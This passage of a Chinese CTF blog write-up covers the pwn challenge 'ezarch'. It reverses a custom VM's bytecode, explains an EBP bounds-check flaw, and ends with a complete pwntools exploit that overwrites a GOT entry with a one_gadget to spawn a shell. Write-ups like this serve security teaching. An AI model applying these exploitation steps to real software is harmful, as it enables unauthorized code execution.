<h3 id="字节跳动ctf-ezarch"><a href="#字节跳动ctf-ezarch" class="headerlink" title="字节跳动ctf ezarch"></a>字节跳动ctf ezarch</h3><h4 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h4><p>程序有以下功能:<br><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">[B]</span>reakpoints</span><br><span class="line"><span class="string">[M]</span>emory Set</span><br><span class="line"><span class="string">[R]</span>un</span><br></pre></td></tr></table></figure></p>
<p>经过分析可以得到虚拟机的全局结构:<br><figure class="highlight basic"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">00000000 </span>info            struc ; (sizeof=<span class="number">0</span>x466, mappedto_6)</span><br><span class="line"><span class="symbol">00000000 </span>                                        ; XREF: .bss:stru_2030C0/r</span><br><span class="line"><span class="symbol">00000000 </span>memory_ptr      dq ?</span><br><span class="line"><span class="symbol">00000008 </span>stack_ptr       dq ?</span><br><span class="line"><span class="symbol">00000010 </span>stack_size      dd ?</span><br><span class="line"><span class="symbol">00000014 </span>memory_size     dd ?</span><br><span class="line"><span class="symbol">00000018 </span>BreakPoint      dd <span class="number">256</span> dup(?)</span><br><span class="line"><span class="symbol">00000418 </span>regs            dd <span class="number">16</span> dup(?)</span><br><span class="line"><span class="symbol">00000458 </span>EIP_            dd ?</span><br><span class="line"><span class="number">0000045</span>C ESP_            dd ?</span><br><span class="line"><span class="symbol">00000460 </span>EBP_            dd ?</span><br><span class="line"><span class="symbol">00000464 </span>eflags          dw ?</span><br><span class="line"><span class="symbol">00000466 </span>info            ends</span><br></pre></td></tr></table></figure></p>
<p>这个结构体是保存在程序的bss段</p>
<h5 id="MemorySet"><a href="#MemorySet" class="headerlink" title="MemorySet"></a>MemorySet</h5><p>MemorySet就是初始化一块内存，用来当做text段，在其中存放字节码<br><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">printf(<span class="string">"[*]Memory size&gt;"</span>)<span class="comment">;</span></span><br><span class="line"><span class="built_in">a2</span> = (info *)((char *)ptr + <span class="number">20</span>)<span class="comment">;</span></span><br><span class="line">__isoc99_scanf(<span class="string">"%u"</span>, &amp;ptr-&gt;memory_size)<span class="comment">;</span></span><br><span class="line">v6 = ptr<span class="comment">;</span></span><br><span class="line">size = ptr-&gt;memory_size<span class="comment">;</span></span><br><span class="line">if ( size &gt; <span class="number">0xA00000</span> )</span><br><span class="line">&#123;</span><br><span class="line">  puts(<span class="string">"[!]too large"</span>)<span class="comment">;</span></span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">  memory_ptr = malloc(size)<span class="comment">;</span></span><br><span class="line">  ...</span><br><span class="line">  v9-&gt;memory_ptr = (__int64)memory_ptr<span class="comment">;</span></span><br></pre></td></tr></table></figure></p>
<p>初始化时，堆输入的size没有限制，可以进行堆溢出<br><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">puts(<span class="string">"[*]Memory inited"</span>);</span><br><span class="line">            printf(<span class="string">"[*]Inited size&gt;"</span>);</span><br><span class="line">            __isoc99_scanf(<span class="string">"%llu"</span>, &amp;init_size);</span><br><span class="line">            printf(<span class="string">"[*]Input Memory Now (0x%llx)\n"</span>, init_size);</span><br><span class="line">            <span class="keyword">while</span> ( idx &lt; init_size )</span><br><span class="line">            &#123;</span><br><span class="line">              v12 = (void *)(ptr-&gt;memory_ptr + idx);</span><br><span class="line">              <span class="keyword">if</span> ( init_size - idx &gt; <span class="number">0</span>xFFF )</span><br><span class="line">              &#123;</span><br><span class="line">                numb = read(<span class="number">0</span>, v12, <span class="number">0</span>x1000uLL);</span><br><span class="line">                <span class="keyword">if</span> ( numb &lt;= <span class="number">0</span> )</span><br><span class="line">                  goto LABEL_26;</span><br><span class="line">              &#125;</span><br><span class="line">              <span class="keyword">else</span></span><br><span class="line">              &#123;</span><br><span class="line">                numb = read(<span class="number">0</span>, v12, init_size - idx);</span><br><span class="line">                <span class="keyword">if</span> ( numb &lt;= <span class="number">0</span> )</span><br><span class="line">LABEL_26:</span><br><span class="line">                  <span class="keyword">exit</span>(<span class="number">1</span>);</span><br><span class="line">              &#125;</span><br><span class="line">              idx += numb;</span><br><span class="line">            &#125;</span><br><span class="line">            puts(<span class="string">"[*]Memory Inited"</span>);</span><br></pre></td></tr></table></figure></p>
<p>自己可以设置eip，esp，ebp:<br><figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">puts(<span class="string">"[*]Memory Inited"</span>)<span class="comment">;</span></span><br><span class="line">puts(<span class="string">"[*]Now init some regs"</span>)<span class="comment">;</span></span><br><span class="line">printf(<span class="string">"eip&gt;"</span>)<span class="comment">;</span></span><br><span class="line">__isoc99_scanf(<span class="string">"%u"</span>, <span class="symbol">&amp;ptr-&gt;EIP_</span>)<span class="comment">;</span></span><br><span class="line">printf(<span class="string">"esp&gt;"</span>)<span class="comment">;</span></span><br><span class="line">__isoc99_scanf(<span class="string">"%u"</span>, <span class="symbol">&amp;ptr-&gt;ESP_</span>)<span class="comment">;</span></span><br><span class="line">printf(<span class="string">"ebp&gt;"</span>)<span class="comment">;</span></span><br><span class="line">__isoc99_scanf(<span class="string">"%u"</span>, <span class="symbol">&amp;ptr-&gt;EBP_</span>)<span class="comment">;</span></span><br></pre></td></tr></table></figure></p>
<p>虚拟机的stack段是程序本身的bss段的一块空间，大小为0x1000字节。</p>
<h5 id="Run"><a href="#Run" class="headerlink" title="Run"></a>Run</h5><p>通过对run函数进行分析，大多数一条指令的长度为 1+1+4+4 = 10字节<br>第一个字节为字节码，第二字节为type，字节码解释时的依据。<br>通过设置type高位4字节和低位4字节来确定第二个操作数和第一个操作数的类型(立即数/寄存器中的值/内存中的值)<br>4,4分别为第一个操作数，第二个操作数<br>也有个别的指令只有第一个操作数</p>
<p>经过分析可以得到如下字节码:<br><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span><span class="built_in">add</span></span><br><span class="line">高位：</span><br><span class="line"><span class="number">0</span>：从寄存器中取值</span><br><span class="line"><span class="number">1</span>：立即数</span><br><span class="line"><span class="number">2</span>：从内存中直接取数据</span><br><span class="line">低位：</span><br><span class="line"><span class="number">0</span>：存进寄存器</span><br><span class="line"><span class="number">2</span>：直接写入内存</span><br><span class="line"> </span><br><span class="line"><span class="number">2.</span>sub</span><br><span class="line">同<span class="built_in">add</span></span><br><span class="line"></span><br><span class="line"><span class="number">3.</span>save</span><br><span class="line">高位：</span><br><span class="line"><span class="number">0</span>：<span class="keyword">second</span> &lt;= <span class="number">15</span>,从寄存器中取值，</span><br><span class="line">   <span class="keyword">second</span> = <span class="number">16</span>，<span class="keyword">second</span> = ESP，</span><br><span class="line">   <span class="keyword">second</span> = <span class="number">17</span>，<span class="keyword">second</span> = EBP</span><br><span class="line"><span class="number">1</span>：立即数</span><br><span class="line"><span class="number">2</span>：<span class="built_in">sec</span> &lt;=<span class="number">15</span>, 内存处相对寻址，</span><br><span class="line">   <span class="built_in">sec</span> ==<span class="number">16</span> <span class="keyword">second</span> = stack[rsp]</span><br><span class="line">   <span class="built_in">sec</span> ==<span class="number">17</span> <span class="keyword">second</span> = stack[rbp]</span><br><span class="line"></span><br><span class="line">低位：</span><br><span class="line"><span class="number">2</span>：<span class="keyword">first</span> &lt;= <span class="number">15</span> , *(memory_ptr + regs[<span class="keyword">first</span>]) = <span class="keyword">second</span></span><br><span class="line">   <span class="keyword">first</span> == <span class="number">16</span> , *(stack_ptr + esp ) = <span class="keyword">second</span></span><br><span class="line">   fisrt == <span class="number">17</span> , *(stack_ptr + ebp ) = <span class="keyword">second</span></span><br><span class="line"><span class="number">0</span>: fisrt &lt;= <span class="number">15</span> , regs[<span class="keyword">first</span>] = <span class="keyword">second</span></span><br><span class="line">   <span class="keyword">first</span> == <span class="number">16</span> ， esp = <span class="keyword">second</span></span><br><span class="line">   <span class="keyword">first</span> == <span class="number">17</span> ,  ebp = <span class="keyword">second</span></span><br><span class="line"></span><br><span class="line"><span class="number">4.</span>xor</span><br><span class="line">高位：</span><br><span class="line"><span class="number">0</span>：<span class="keyword">second</span> = regs[<span class="keyword">second</span>]</span><br><span class="line"><span class="number">1</span>: <span class="keyword">second</span> = <span class="keyword">second</span></span><br><span class="line"><span class="number">2</span>：<span class="keyword">second</span> = *(mem_ptr + regs[<span class="keyword">second</span>])</span><br><span class="line">低位：</span><br><span class="line"><span class="number">2</span>：*(<span class="keyword">first</span>+regs[<span class="keyword">first</span>]) ^= <span class="keyword">second</span></span><br><span class="line"><span class="number">0</span>: regs[<span class="keyword">first</span>] ^= <span class="keyword">second</span></span><br><span class="line"></span><br><span class="line"><span class="number">5.</span><span class="keyword">or</span></span><br><span class="line">同xor</span><br><span class="line"><span class="number">6.</span><span class="keyword">and</span></span><br><span class="line">同xor</span><br><span class="line"><span class="number">7.</span>shift left</span><br><span class="line">同xor</span><br><span class="line"><span class="number">8.</span>shift <span class="literal">right</span></span><br><span class="line">同xor</span><br><span class="line"></span><br><span class="line"><span class="number">9.</span>push</span><br><span class="line"><span class="number">10.</span>pop</span><br><span class="line"><span class="number">11.</span>call</span><br><span class="line"><span class="number">12.</span>ret</span><br><span class="line"><span class="number">13</span>,<span class="number">14</span> cmp,根据结果设置eflag位</span><br></pre></td></tr></table></figure></p>
<h5 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h5><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">eip_</span> = ptr-&gt;</span>EIP_;</span><br><span class="line"><span class="function"><span class="title">mem_size</span> = ptr-&gt;</span>memory_size;</span><br><span class="line"><span class="function"><span class="title">if</span> ( eip_ &gt;= mem_size || (unsigned int)ptr-&gt;</span>ESP_ &gt;= <span class="function"><span class="title">ptr</span>-&gt;</span><span class="function"><span class="title">stack_size</span> || mem_size &lt;= ptr-&gt;</span>EBP_ )</span><br><span class="line">  return <span class="number">1</span>LL;</span><br><span class="line">v3 = <span class="number">0</span>LL;</span><br><span class="line"><span class="function"><span class="title">opcode_ptr</span> = ptr-&gt;</span>memory_ptr + eip_;</span><br></pre></td></tr></table></figure>
<p>run函数开始处对ptr-&gt;EBP的判断有问题，这里判断是 ptr-&gt;EBP&lt;= mem_size这可以通过，mem_size完全可以大于stack_size，这样输入的EBP值就可以大于stack_size，就可以进行越界读取.</p>
<p>程序bss段的布局如下:</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">stack <span class="number">0x1000</span></span><br><span class="line"></span><br><span class="line">VM_info :</span><br><span class="line">	mem_ptr</span><br><span class="line"><span class="symbol">	stack_ptr:</span>指向上面的stack</span><br><span class="line">	stack_size = <span class="number">0x1000</span></span><br><span class="line">	mem_size</span><br><span class="line">	BreakPoint[<span class="number">256</span>]</span><br><span class="line">    regs[<span class="number">16</span>]</span><br><span class="line">	<span class="built_in">Eip</span></span><br><span class="line">	<span class="built_in">Esp</span></span><br><span class="line">	<span class="built_in">Ebp</span></span><br><span class="line">	eflags</span><br></pre></td></tr></table></figure>
<p>stack段的下面就是VM_info这个结构体。<br>这样就利用save越界读取stack_ptr，然后保存到regs[0]中，再利用sub，将regs[0]减到got表的地址，再利用save修改stack_ptr为regs[0]，这样stack_ptr就指向了got表项，利用同样的方法读取libc地址，然后加减到one_gadget即可</p>
<h4 id="完整exp-1"><a href="#完整exp-1" class="headerlink" title="完整exp:"></a>完整exp:</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">local = <span class="number">1</span></span><br><span class="line">exec_file=<span class="string">"./ezarch"</span></span><br><span class="line">context.binary=exec_file</span><br><span class="line">context.terminal=[<span class="string">"tmux"</span>,<span class="string">"splitw"</span>,<span class="string">"-h"</span>]</span><br><span class="line">elf=ELF(exec_file)</span><br><span class="line"><span class="keyword">if</span> local :</span><br><span class="line">    a=process(exec_file)</span><br><span class="line">    <span class="keyword">if</span> context.arch == <span class="string">"i386"</span> :</span><br><span class="line">        libc=ELF(<span class="string">"/lib/i386-linux-gnu/libc.so.6"</span>)</span><br><span class="line">    <span class="keyword">elif</span> context.arch == <span class="string">"amd64"</span> :</span><br><span class="line">        libc=ELF(<span class="string">"/lib/x86_64-linux-gnu/libc.so.6"</span>) </span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    a=remote(<span class="string">""</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_base</span><span class="params">(a)</span>:</span></span><br><span class="line">    text_base = a.libs()[a._cwd+a.argv[<span class="number">0</span>].strip(<span class="string">'.'</span>)]</span><br><span class="line">    <span class="keyword">for</span> key <span class="keyword">in</span> a.libs():</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"libc.so.6"</span> <span class="keyword">in</span> key:</span><br><span class="line">            <span class="keyword">return</span> text_base,a.libs()[key]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span><span class="params">()</span>:</span></span><br><span class="line">    text_base,libc_base=get_base(a)</span><br><span class="line">    script=<span class="string">"set $text_base="</span>+str(text_base)+<span class="string">'\n'</span>+<span class="string">"set $libc_base="</span>+str(libc_base)+<span class="string">'\n'</span></span><br><span class="line">    script+=<span class="string">'''</span></span><br><span class="line"><span class="string">    b *</span></span><br><span class="line"><span class="string">    '''</span></span><br><span class="line">    gdb.attach(a,script)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span><span class="params">(idx)</span>:</span></span><br><span class="line">    a.sendlineafter(<span class="string">"R]un\n[E]xit\n&gt;"</span>,idx)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Init</span><span class="params">(content,eip,esp,ebp)</span>:</span></span><br><span class="line">    menu(<span class="string">"M"</span>)</span><br><span class="line">    a.sendlineafter(<span class="string">"[*]Memory size&gt;"</span>,str(<span class="number">0x6000</span>))</span><br><span class="line">    a.sendlineafter(<span class="string">"[*]Inited size&gt;"</span>,str(len(content)))</span><br><span class="line">    a.sendafter(<span class="string">"\n"</span>,content)</span><br><span class="line">    a.sendlineafter(<span class="string">"eip&gt;"</span>,str(eip))</span><br><span class="line">    a.sendlineafter(<span class="string">"esp&gt;"</span>,str(esp))</span><br><span class="line">    a.sendlineafter(<span class="string">"ebp&gt;"</span>,str(ebp))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">save</span><span class="params">(t,op1,op2)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">'\x03'</span>+t+p32(op1)+p32(op2)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(t,op1,op2)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">'\x01'</span>+t+p32(op1)+p32(op2)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sub</span><span class="params">(t,op1,op2)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">'\x02'</span>+t+p32(op1)+p32(op2)</span><br><span class="line">payload = <span class="string">""</span></span><br><span class="line"><span class="comment">#save regs[0] , stack[rbp]</span></span><br><span class="line"><span class="comment">#将stack+rbp处的值放到regs[0]处</span></span><br><span class="line"></span><br><span class="line">payload += save(<span class="string">'\x20'</span>,<span class="number">0</span>,<span class="number">17</span>) </span><br><span class="line"></span><br><span class="line"><span class="comment">#sub regs[0], 0xa0</span></span><br><span class="line"><span class="comment"># 减去 0xa0 指向 puts_got</span></span><br><span class="line">payload += sub(<span class="string">'\x10'</span>,<span class="number">0</span>,<span class="number">0xa0</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#save stack[rbp] , regs[0]</span></span><br><span class="line"><span class="comment">#保存到 stack_ptr</span></span><br><span class="line">payload += save(<span class="string">'\x02'</span>,<span class="number">17</span>,<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#save regs[0],stack[rsp]</span></span><br><span class="line"><span class="comment">#将puts_addr低位放入regs[0]</span></span><br><span class="line">payload += save(<span class="string">'\x20'</span>,<span class="number">0</span>,<span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">one_offset = -(<span class="number">0x45216</span>-libc.symbols[<span class="string">"puts"</span>])</span><br><span class="line"><span class="comment">#sub regs[0],one_offset</span></span><br><span class="line"><span class="comment">#减到 one_gadget</span></span><br><span class="line">payload += sub(<span class="string">'\x10'</span>,<span class="number">0</span>,one_offset)</span><br><span class="line"><span class="comment">#save stack[rsp],regs[0]</span></span><br><span class="line">payload += save(<span class="string">'\x02'</span>,<span class="number">16</span>,<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">Init(payload,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0x1008</span>)</span><br><span class="line">menu(<span class="string">'R'</span>)</span><br><span class="line">a.interactive()</span><br></pre></td></tr></table></figure>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/25/KCTF-2019-Q3-V8-exploit/" rel="next" title="KCTF 2019 Q3 V8 exploit">
                <i class="fa fa-chevron-left"></i> KCTF 2019 Q3 V8 exploit
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/09/30/QWB2019-babycpp-random复现/" rel="prev" title="QWB2019 babycpp & random复现">
                QWB2019 babycpp & random复现 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/my.jpg" alt="ditto">
            
              <p class="site-author-name" itemprop="name">ditto</p>
              <p class="site-description motion-element" itemprop="description">pwn for fun</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">24</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/Dittozzz" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ciscn-2019-Virtual"><span class="nav-number">2.</span> <span class="nav-text">ciscn 2019 Virtual</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#分析"><span class="nav-number">2.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞利用"><span class="nav-number">2.2.</span> <span class="nav-text">漏洞利用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#完整exp"><span class="nav-number">2.3.</span> <span class="nav-text">完整exp:</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#字节跳动ctf-ezarch"><span class="nav-number">3.</span> <span class="nav-text">字节跳动ctf ezarch</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#分析-1"><span class="nav-number">3.1.</span> <span class="nav-text">分析</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#MemorySet"><span class="nav-number">3.1.1.</span> <span class="nav-text">MemorySet</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Run"><span class="nav-number">3.1.2.</span> <span class="nav-text">Run</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#漏洞利用-1"><span class="nav-number">3.1.3.</span> <span class="nav-text">漏洞利用</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#完整exp-1"><span class="nav-number">3.2.</span> <span class="nav-text">完整exp:</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ditto</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">50.7k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>



        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
